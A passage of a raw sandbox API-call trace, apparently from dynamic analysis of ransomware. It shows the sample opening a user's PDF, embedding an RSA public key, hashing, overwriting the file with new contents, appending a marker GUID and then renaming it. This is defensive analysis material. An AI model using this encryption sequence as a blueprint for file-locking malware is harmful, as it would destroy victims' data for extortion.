cFileName="IsKKH1qGBDUE_t.pdf", cAlternateFileName="ISKKH1~1.PDF")) returned 1 [0240.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0240.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0240.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e5f8 | out: hHeap=0x620000) returned 1 [0240.727] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\IsKKH1qGBDUE_t.pdf") returned=".pdf" [0240.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\IsKKH1qGBDUE_t.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\iskkh1qgbdue_t.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0240.728] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=4063) returned 1 [0240.728] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0240.730] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xfb9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.730] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0240.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0240.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.732] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0240.732] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xfdf, lpOverlapped=0x0) returned 1 [0240.732] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0240.733] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.733] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.733] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0240.734] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0240.734] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0240.734] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0240.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0240.734] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0240.734] GetLastError () returned 0x0 [0240.734] CryptDestroyHash (hHash=0x33f0408) returned 1 [0240.734] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0240.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0240.734] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0240.734] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0240.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0240.734] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0240.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0240.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfe0) returned 0x3b89cd0 [0240.734] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0240.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8f7c0 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e68 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8f808 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e80 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88eb0 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f10 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ec8 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0240.735] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0240.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0240.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88eb0 | out: hHeap=0x620000) returned 1 [0240.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ec8 | out: hHeap=0x620000) returned 1 [0240.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f10 | out: hHeap=0x620000) returned 1 [0240.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0240.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f10 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88ec8 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88eb0 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0240.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0240.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0240.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ec8 | out: hHeap=0x620000) returned 1 [0240.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0240.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88eb0 | out: hHeap=0x620000) returned 1 [0240.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0240.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0240.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f10 | out: hHeap=0x620000) returned 1 [0240.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0240.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0240.737] GetCurrentThreadId () returned 0x5b4 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b88b48 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.737] GetCurrentThreadId () returned 0x5b4 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33adda8 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0240.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0240.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f10 [0240.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88eb0 [0240.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0240.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0240.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88ec8 [0240.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0240.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0240.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0240.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e98 [0240.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0240.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f28 [0240.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0240.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0240.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ef8 [0240.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ee0 [0240.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f40 [0240.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ee0 | out: hHeap=0x620000) returned 1 [0240.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88ee0 [0240.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ef8 | out: hHeap=0x620000) returned 1 [0240.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0240.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0240.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0240.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0240.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88eb0 | out: hHeap=0x620000) returned 1 [0240.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88eb0 [0240.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0240.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0240.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f10 | out: hHeap=0x620000) returned 1 [0240.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0240.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f40 | out: hHeap=0x620000) returned 1 [0240.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0240.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0240.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0240.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0240.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88eb0 | out: hHeap=0x620000) returned 1 [0240.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0240.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a110 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ee0 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f28 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ec8 | out: hHeap=0x620000) returned 1 [0240.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e98 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e80 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f808 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0240.742] WriteFile (in: hFile=0x644, lpBuffer=0x3b89cd0*, nNumberOfBytesToWrite=0xfda, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b89cd0*, lpNumberOfBytesWritten=0x39afb14*=0xfda, lpOverlapped=0x0) returned 1 [0240.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0240.742] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xfdf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.743] WriteFile (in: hFile=0x644, lpBuffer=0x6affc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x6affc0*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0240.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0240.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0240.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0240.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0240.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0240.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0240.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0240.743] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0240.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0240.743] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0240.743] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0240.744] CloseHandle (hObject=0x644) returned 1 [0240.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a87c0 [0240.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b89cd0 [0240.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0240.745] MoveFileW 